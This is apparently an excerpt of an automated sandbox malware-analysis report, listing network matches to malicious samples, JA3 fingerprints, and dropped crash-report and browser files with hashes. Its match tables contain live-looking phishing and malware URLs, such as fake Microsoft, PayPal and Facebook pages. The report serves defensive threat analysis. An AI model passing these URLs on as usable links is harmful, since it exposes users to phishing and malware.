                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                COGENT-174USev1NIvTd6f.exeGet hashmaliciousUnknownBrowse
                                • 38.180.120.148
                                M4huqujaBY.elfGet hashmaliciousUnknownBrowse
                                • 149.6.31.170
                                cVxP229sNF.elfGet hashmaliciousUnknownBrowse
                                • 38.57.141.90
                                fdftMGtnix.elfGet hashmaliciousUnknownBrowse
                                • 167.141.205.77
                                3LI2VAvf26.elfGet hashmaliciousUnknownBrowse
                                • 38.82.140.230
                                wyZ1vPGwGw.elfGet hashmaliciousUnknownBrowse
                                • 149.33.83.109
                                h73eD4sruD.elfGet hashmaliciousUnknownBrowse
                                • 154.28.148.142
                                M2Vf6ASl3g.elfGet hashmaliciousUnknownBrowse
                                • 38.220.172.171
                                SjLTg00G6b.elfGet hashmaliciousMiraiBrowse
                                • 38.89.76.148
                                c0jeXEeVbR.elfGet hashmaliciousMiraiBrowse
                                • 38.181.76.141
                                FASTLYUShttps://verify-signinoutlexchangeadmin.com/MBill@microsoft.comGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                • 151.101.2.137
                                https://paypalgiftcardgenerator.pages.dev/Get hashmaliciousUnknownBrowse
                                • 151.101.129.140
                                https://brownpluss.com/Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                • 151.101.66.137
                                Remittance#26856.htmlGet hashmaliciousHTMLPhisherBrowse
                                • 151.101.130.137
                                https://help-fb-recovery-center.github.io/notification/index.htmlGet hashmaliciousUnknownBrowse
                                • 185.199.111.153
                                http://y6ss1.shop/Get hashmaliciousUnknownBrowse
                                • 151.101.130.137
                                https://sweet-moonbeam-28ccf4.netlify.app/appeal.html/Get hashmaliciousUnknownBrowse
                                • 151.101.129.229
                                https://rishi851130.github.io/Facebook-Clone/index.htmlGet hashmaliciousUnknownBrowse
                                • 185.199.111.153
                                https://fbrestriction.wixsite.com/facebookGet hashmaliciousUnknownBrowse
                                • 151.101.2.217
                                https://pub-dde186d3ef204edd89e847d256cdf5bd.r2.dev/ghupl.htmlGet hashmaliciousUnknownBrowse
                                • 151.101.130.137
                                CLOUDFLARENETUSTEILll7BsZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                • 188.114.96.3
                                https://verify-signinoutlexchangeadmin.com/MBill@microsoft.comGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                • 104.17.2.184
                                Pd3mM82Bs6.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                • 188.114.97.3
                                https://paypalgiftcardgenerator.pages.dev/Get hashmaliciousUnknownBrowse
                                • 104.16.242.248
                                https://brownpluss.com/Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                • 104.17.2.184
                                setup_CodecInstaller_full.exeGet hashmaliciousEICARBrowse
                                • 172.67.130.88
                                MV XH DOLPHINPDF.exeGet hashmaliciousLokibotBrowse
                                • 104.21.85.101
                                WQs56g5xeC.exeGet hashmaliciousDCRatBrowse
                                • 172.67.25.118
                                xA4LQYIndy.exeGet hashmaliciousDCRatBrowse
                                • 172.67.19.24
                                Remittance#26856.htmlGet hashmaliciousHTMLPhisherBrowse
                                • 104.26.13.205
                                MICROSOFT-CORP-MSN-AS-BLOCKUShttps://paypalgiftcardgenerator.pages.dev/Get hashmaliciousUnknownBrowse
                                • 13.107.246.45
                                https://origines-decoration.com/Get hashmaliciousUnknownBrowse
                                • 20.4.130.154
                                https://sandnidenokvxzijas.theone-4.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                • 40.99.157.50
                                URocnz2wNj.elfGet hashmaliciousUnknownBrowse
                                • 20.152.119.121
                                8427xbk3Zt.elfGet hashmaliciousUnknownBrowse
                                • 104.147.102.44
                                T57QiayIem.elfGet hashmaliciousUnknownBrowse
                                • 20.48.125.78
                                M4huqujaBY.elfGet hashmaliciousUnknownBrowse
                                • 40.102.15.40
                                cVxP229sNF.elfGet hashmaliciousUnknownBrowse
                                • 20.234.181.193
                                3LI2VAvf26.elfGet hashmaliciousUnknownBrowse
                                • 20.48.137.14
                                ccsetup624.exeGet hashmaliciousUnknownBrowse
                                • 20.50.2.53

                                JA3 Fingerprints

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                6271f898ce5be7dd52b0fc260d0662b3NFs_468.msiGet hashmaliciousVMdetectBrowse
                                • 151.101.1.108
                                • 18.244.18.38
                                • 151.101.130.137
                                fffmpeg.exeGet hashmaliciousUnknownBrowse
                                • 151.101.1.108
                                • 18.244.18.38
                                • 151.101.130.137
                                http://003999.ccGet hashmaliciousUnknownBrowse
                                • 151.101.1.108
                                • 18.244.18.38
                                • 151.101.130.137
                                Webex.exeGet hashmaliciousUnknownBrowse
                                • 151.101.1.108
                                • 18.244.18.38
                                • 151.101.130.137
                                Items.xlsGet hashmaliciousUnknownBrowse
                                • 151.101.1.108
                                • 18.244.18.38
                                • 151.101.130.137
                                https://u44668105.ct.sendgrid.net/ls/click?upn=u001.BTMESiTo6NsF48uIW4-2BrJkEc2YVFzyAaMWnWwgGT9cZqZS45ZZqu4Y-2FXJmZd8BXA8cja_AHV3UK6XjfrXMiZ9J4igW-2FDEUbICycoJ744IkX0PR6FoPBD5ixGfLkyQ9ofRFx1gjy-2BP-2BDUWqu7bhyffh6xflqZsbtNZtMLnpgQoCGrYBrKDAQCrs-2BXh7tVhTtmxcULJOM-2BKcO31hWTdcLyh6xHaFmrsv6JFsx6tjkxHhVyYzmDL2WjDZWPIbWyOCKFNxt29pnc1D6Wos9by2AU7AhdVB3KlHpWThOWm6-2FAP-2Buqng4Vq-2BmwndZ6wQGKVc-2FG51viAW-2FpPzuJOGK4hC-2FF-2FfgyonvDWvDkNa4J3BejflmN-2BuGCUZSHoW4H7oETlKRzn4f7VwMbU0WFOF9ZUfOI6CISxhvZQTsnMYzitMow1nPeu-2Flg0-2FzAaZA27HnZ5WdxtR2wKofgxyBDPpPjMUDCXBmEfEWtT8NXGmNaNpBvJDLI13EkOwRxoG67u0CqbvxxYYK-2F5eu2B-2Bg9JTJRxFbICA7lEJgDZLYhBS-2BbGjIrrRDvHg0hAvMhBJ54TVAoWNvYZYG-2FCqbCuzJrUBI0DoaRAGLq44smm73hnjeG06IT3WQV3A8KkhlXB3fqBFue-2Fd4ydFypfr1PkBzxIk-2FPd1H2pJdMYF-2B7HONDoFax8K-2BBkvfgdiIY-3DGet hashmaliciousHTMLPhisherBrowse
                                • 151.101.1.108
                                • 18.244.18.38
                                • 151.101.130.137
                                https://atualizar-cmd.com/Get hashmaliciousUnknownBrowse
                                • 151.101.1.108
                                • 18.244.18.38
                                • 151.101.130.137
                                fileEEE.batGet hashmaliciousUnknownBrowse
                                • 151.101.1.108
                                • 18.244.18.38
                                • 151.101.130.137
                                https://assets-fra.mkt.dynamics.com/0cc4a623-6510-ef11-9f83-002248da15fa/digitalassets/standaloneforms/6e39a88b-9710-ef11-9f89-002248d9c773Get hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                • 151.101.1.108
                                • 18.244.18.38
                                • 151.101.130.137
                                phish_alert_sp2_2.0.0.0-214.emlGet hashmaliciousUnknownBrowse
                                • 151.101.1.108
                                • 18.244.18.38
                                • 151.101.130.137

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ISS0KW2GTVSPLPPT_18aad88c17cca3c71412844037fa3a7597f5f951_7bae6ab0_4b393249-1c71-42b8-a01c-e97bfe7185eb\Report.wer

                                Download File
                                Process:C:\Windows\System32\WerFault.exe
                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):1.0734211054359508
                                Encrypted:false
                                SSDEEP:384:xv6QoL68L6c2FuFPHj6e6wam8OzuiFmY4lO836C/:p6Qm6a6GFPHj6e6wa6zuiFmY4lO836
                                MD5:58B30DD74E2EE4CC4C7B48F52A5AC370
                                SHA1:822E7349C9708858A66D8C9D69A5DFF9EF9E95A6
                                SHA-256:E08C90B6841011590B7B283F1931AAFA6F5533D510FD76E39CD4C1692B8278E8
                                SHA-512:E02393DD193B61A4C80D3142686C6CBC2E4A3244C2996D1168028455695DB2C3AC03B1910E129F793BD19CE27DAE2CA667872B3028BD659E2BADE85F6A6EA855
                                Malicious:false
                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.1.2.6.5.7.2.7.1.1.0.9.3.8.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.1.2.6.5.7.2.7.6.8.9.0.6.6.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.b.3.9.3.2.4.9.-.1.c.7.1.-.4.2.b.8.-.a.0.1.c.-.e.9.7.b.f.e.7.1.8.5.e.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.2.e.c.b.5.6.2.-.7.6.9.9.-.4.e.e.e.-.b.6.8.2.-.c.5.4.8.9.7.9.8.1.c.4.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.#.U.0.4.2.6.#.U.0.4.3.8.#.U.0.4.4.2.#.U.0.4.3.0.#.U.0.4.4.2.#.U.0.4.3.0...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.I.z.e.m.u.x.a.q.i.q.a.w.i.v.u.l.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.6.c.-.0.0.0.1.-.0.0.1.4.-.6.8.f.5.-.d.b.f.a.0.0.b.0.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.d.6.c.1.1.b.5.0.c.d.2.9.4.5.1.9.a.9.9.7.6.3.5.7.1.8.a.5.5.2.d.0.0.0.0.0.0.0.0.!.0.0.0.0.6.0.9.a.2.6.e.9.5.e.4.b.3.4.3.b.f.b.4.7.a.

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER4970.tmp.dmp

                                Download File
                                Process:C:\Windows\System32\WerFault.exe
                                File Type:Mini DuMP crash report, 16 streams, Mon May 27 06:42:07 2024, 0x1205a4 type
                                Category:dropped
                                Size (bytes):455410
                                Entropy (8bit):3.467166328215764
                                Encrypted:false
                                SSDEEP:3072:0YgmcUAgwAsuP/UhclIB4sjcS4mn1CCqyPF5E3+vQtdN9tdN9tdN9td7G6/:/gpc7PnUdX3nqJ3Qv6
                                MD5:AFD6F7FD05156C78C43B810421D3C20F
                                SHA1:FBB13C47D0069BC54021E56E302D2926F443823F
                                SHA-256:760006B41B32D8340453F0B232F98BF1A7F1BD46C909A2033598FF189B263C2E
                                SHA-512:22DFB9FE7722DAC78D3281D4DDDB02B81B1CBEEC61E9A6BEB3F293FE4174D9B047ABCC34683AC3DF5B7A70054F813598E6BE15BBC7A6800D53DFA8095B4E0144
                                Malicious:false
                                Preview:MDMP..a..... .......?+Tf....................................$...........x2...........k..j...........l.......8...........T............*..b...........PP..........<R..............................................................................eJ.......R......Lw......................T.......l...9+Tf.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER4AB9.tmp.WERInternalMetadata.xml

                                Download File
                                Process:C:\Windows\System32\WerFault.exe
                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8718
                                Entropy (8bit):3.7171874406738916
                                Encrypted:false
                                SSDEEP:192:R6l7wVeJe6hFsw6Y9JniJgmfZXUMprr89blbH+fcP/jm:R6lXJe6zj6YTniJgmfJ+lbefcX6
                                MD5:A5BF748C4CFCA78E17759F2778CC39D5
                                SHA1:ED298FD5630F5D884E3A55B915CAECD24250DE4F
                                SHA-256:060BB19FA710B97FE4BFC236090E7BDDBAA27F95258B60CBECC9D8DB74E496DD
                                SHA-512:327875CD8ADE7373D11A343A799A879428B38DF83DC6DEB3BF9D26C505A1EF4D7333C700DB1D0004B0E5E00C9F289B7A20CC7F33FCA5F214E435BCC9809DBFD9
                                Malicious:false
                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.3.2.<./.P.i.

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER4AE9.tmp.xml

                                Download File
                                Process:C:\Windows\System32\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4942
                                Entropy (8bit):4.602767907576402
                                Encrypted:false
                                SSDEEP:48:cvIwWl8zsnJg771I95mWpW8VYB7Ym8M4JyOE6FnHyq8vTOEaBXJA86d:uIjfJI7en7VBJWgWLaB5A86d
                                MD5:20EFDA9F514B638A6FB18D1AE11C18F1
                                SHA1:349DA5C7DC163FBC2002C823FC376C9888323077
                                SHA-256:C2BE716851CA3E23DF0DF13BF1C25D764AD38BBE4FED87694ACFE6564C2CD252
                                SHA-512:EAFAED8D2568228F6EDA5422929F9F08E4FC11F67426BC5A004E68CF0C5B5D615C28D36A10A543867F995DC24D4F2F973AC818C910CB929B68AD39510F257995
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="341144" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\IL12IBIT\www.msn[1].xml

                                Download File
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):126
                                Entropy (8bit):4.925892995934656
                                Encrypted:false
                                SSDEEP:3:D9yRtFwsSxzqC+eAsLE4YHFk6xWXaULzAqTUzXB9LKb:JUF+FqCqTPQXaULat9ub
                                MD5:515AB1A3E26D9F3BA041784C07431008
                                SHA1:DA905C7DF7CF69A297A2CB18C3399DAE8A5A0F6B
                                SHA-256:497A92BA77DBCC04527EB39380F64A44243BAEBA4A72DD726B4BD97D5DCE85C2
                                SHA-512:7138C6EEE0D640AE5A82412F0D94DC08EA1E4B5A66873E1EC453AE99C45FA22129CFD909D684B84D1D65A17F9231F0F8C19EE490CA09C56290F35A039992D435
                                Malicious:false
                                Preview:<root><item name="pageVersions" value="{&quot;hp&quot;:&quot;20240523.136&quot;}" ltime="333263184" htime="31109121" /></root>

                                C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico

                                Download File
                                Process:C:\Program Files\Internet Explorer\iexplore.exe
                                File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                Category:dropped
                                Size (bytes):4286
                                Entropy (8bit):3.8046022951415335
                                Encrypted:false
                                SSDEEP:24:suZOWcCXPRS4QAUs/KBy3TYI42Apvl6wheXpktCH2Yn4KgISQggggFpz1k9PAYHu:HBRh+sCBykteatiBn4KWi1+Ne
                                MD5:DA597791BE3B6E732F0BC8B20E38EE62
                                SHA1:1125C45D285C360542027D7554A5C442288974DE
                                SHA-256:5B2C34B3C4E8DD898B664DBA6C3786E2FF9869EFF55D673AA48361F11325ED07
                                SHA-512:D8DC8358727590A1ED74DC70356AEDC0499552C2DC0CD4F7A01853DD85CEB3AEAD5FBDC7C75D7DA36DB6AF2448CE5ABDFF64CEBDCA3533ECAD953C061A9B338E
                                Malicious:false
                                Preview:...... .... .........(... ...@..... ...................................................................................................................................................................................................N...Sz..R...R...P...N..L..H..DG..........................................................................................R6..U...U...S...R...P...N..L..I..F..B...7...............................................................................S6..V...V...U...S...R...P...N..L..I..F..C...?..:z......................................................................O...W...V...V...U...S...R...P...N..L..I..E..C...?...;..{7..q2$..............................................................T..D..]...S)..p6..J...R...P...N..L..I..E..B..>..;..z7..p2..f,X.........................................................A..O#..N!..N!..N!..P$..q:...P...N..K..I..E..A..=..9..x5..n0..e,...5...................................................Ea.Z,..T$..T$..T

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\0c021396-5187-48c5-a30c-0681649636cb.tmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):25002
                                Entropy (8bit):6.065991058495633
                                Encrypted:false
                                SSDEEP:768:PM7X2zt1jOXtXi3zDr7Z6yX+iFlWuhuatPB:PMSzMtXijv7pFlDu65
                                MD5:67D0E0D9D7762D66BF060096200E3819
                                SHA1:8FEB51BE95E8A97BEE6A22E1ED2950ABEA6B9A75
                                SHA-256:E3052921E544982B441EB92201A2F60D887234CF8C86CE1C0CEB24538B6CAFA9
                                SHA-512:DB681E5C98C1F84FE480E30F16BECB3A068CEA8D685351E55E7327CAE87C5761E0157C643804E9EC57CF35D3B9EB319B348C538391B48DD5B37C974480393062
                                Malicious:false
                                Preview:{"abusive_adblocker_etag":"\"6299A61D48C25647EA67BB9AD1ED65CD4AE48010AACD34D9F797A4A16B03B527\"","apps_count_check_time":"13361265752358297","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg8mcY6CmCjTJCmtsWFOcUf5vj04cw0e1yZe2WAl8svFn5IC43jfc+dLnGrEyDwAicHCxNdhlrVa5LEtTgt5u2lAK02pd1

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\17bc5c1a-b5bb-4c2c-9500-68562e742675.tmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):26032
                                Entropy (8bit):6.068092370471732
                                Encrypted:false
                                SSDEEP:768:PM7X2zt1jOXtXi3zDr7Z6UXTQ+bCFlWuhuatPo:PMSzMtXijv7hCFlDu6A
                                MD5:52A518AE19743321FB0D485B83A640DC
                                SHA1:B5D9FBCE1714D293E0E715CFF8B69830E3742F7D
                                SHA-256:5EE1B6344189FE0D8F89E83725671DD19D894F4057CDA3C61EA54E1C0DA5090B
                                SHA-512:4104583AF54C36A0BC10D5EE0C76A9CE889ADBBC3B6652536C9D7AD8066DC4DAF566885D638140F2579844C881A05FD127C11D8BD1815FF8F1937AE89E2C4396
                                Malicious:false
                                Preview:{"abusive_adblocker_etag":"\"6299A61D48C25647EA67BB9AD1ED65CD4AE48010AACD34D9F797A4A16B03B527\"","apps_count_check_time":"13361265752358297","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg8mcY6CmCjTJCmtsWFOcUf5vj04cw0e1yZe2WAl8svFn5IC43jfc+dLnGrEyDwAicHCxNdhlrVa5LEtTgt5u2lAK02pd1

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\2b21f4c0-cd16-49c0-a708-9207ec9ed4d7.tmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:modified
                                Size (bytes):26032
                                Entropy (8bit):6.068092370471732
                                Encrypted:false
                                SSDEEP:768:PM7X2zt1jOXtXi3zDr7Z6UXTQ+bCFlWuhuatPo:PMSzMtXijv7hCFlDu6A
                                MD5:52A518AE19743321FB0D485B83A640DC
                                SHA1:B5D9FBCE1714D293E0E715CFF8B69830E3742F7D
                                SHA-256:5EE1B6344189FE0D8F89E83725671DD19D894F4057CDA3C61EA54E1C0DA5090B
                                SHA-512:4104583AF54C36A0BC10D5EE0C76A9CE889ADBBC3B6652536C9D7AD8066DC4DAF566885D638140F2579844C881A05FD127C11D8BD1815FF8F1937AE89E2C4396
                                Malicious:false
                                Preview:{"abusive_adblocker_etag":"\"6299A61D48C25647EA67BB9AD1ED65CD4AE48010AACD34D9F797A4A16B03B527\"","apps_count_check_time":"13361265752358297","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg8mcY6CmCjTJCmtsWFOcUf5vj04cw0e1yZe2WAl8svFn5IC43jfc+dLnGrEyDwAicHCxNdhlrVa5LEtTgt5u2lAK02pd1

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\2c69b5c8-b295-4a90-bad6-7bff9c2033d4.tmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):26032
                                Entropy (8bit):6.068103359563717
                                Encrypted:false
                                SSDEEP:768:PM7X2zt1jOXtXi3zDr7Z6UXtu+bCFlWuhuatPo:PMSzMtXijv7pCFlDu6A
                                MD5:B0A0717BB481BC93993F969D84222353
                                SHA1:C1B03FD4E50D2103797908ED07BE7E90F100073E
                                SHA-256:BC05FB2C5DC191F83993225E58F433D07E3CC0774A28EFAD85F24727F01636BC
                                SHA-512:57F2E5BC9A378E20219873EB0F33A61461F84FD45792390C2ADAF671C534A1576BEE95B99FC9129679E9AFF2085DD5361273AC63DD0D07D9FEA3263B92F35CAB
                                Malicious:false
                                Preview:{"abusive_adblocker_etag":"\"6299A61D48C25647EA67BB9AD1ED65CD4AE48010AACD34D9F797A4A16B03B527\"","apps_count_check_time":"13361265752358297","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg8mcY6CmCjTJCmtsWFOcUf5vj04cw0e1yZe2WAl8svFn5IC43jfc+dLnGrEyDwAicHCxNdhlrVa5LEtTgt5u2lAK02pd1

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\34b9a087-8024-4db3-8482-4bdeca2b21e1.tmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):8325
                                Entropy (8bit):5.791462919939801
                                Encrypted:false
                                SSDEEP:192:fsNwxMnE7PeiRUYVQck+W+T6qRAq1k8SPxVLZ7VTiQ:fsNwxcEfNqX+d6q3QxVNZTiQ
                                MD5:64DE1385A2A9FFA95907BD847E2CD77A
                                SHA1:25913D92A2E168609A6C420A7113FBC583144715
                                SHA-256:0D066BCCFD7A2DCD8DBFB2071C832ED8AF1EC936C6B8457253EDDA79A832B123
